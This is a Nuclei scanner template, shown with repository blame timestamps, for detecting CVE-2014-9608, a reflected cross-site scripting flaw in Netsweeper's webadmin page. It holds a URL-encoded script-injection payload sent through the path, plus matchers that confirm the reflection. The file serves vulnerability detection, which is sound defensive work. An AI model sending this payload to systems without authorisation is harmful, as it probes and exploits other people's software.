nuclei-templates/cves/2014/CVE-2014-9608.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

2021-12-06 16:38:54 +00:00
id: CVE-2014-9608
info:
name: Netsweeper 4.0.3 - Cross-Site Scripting
2021-12-06 16:38:54 +00:00
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
2021-12-07 07:25:09 +00:00
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
2021-12-07 07:35:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-9608
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-9608
cwe-id: CWE-79
2021-12-07 07:25:09 +00:00
tags: cve,cve2014,netsweeper,xss
2021-12-06 16:38:54 +00:00
requests:
- method: GET
path:
2021-12-07 07:25:09 +00:00
- '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-12-06 16:38:54 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2021-12-07 07:25:09 +00:00
words:
- '</script><script>alert(document.domain)</script>'
2021-12-06 16:38:54 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
2021-12-07 07:25:09 +00:00
- 200
# Enhanced by mp on 2022/02/25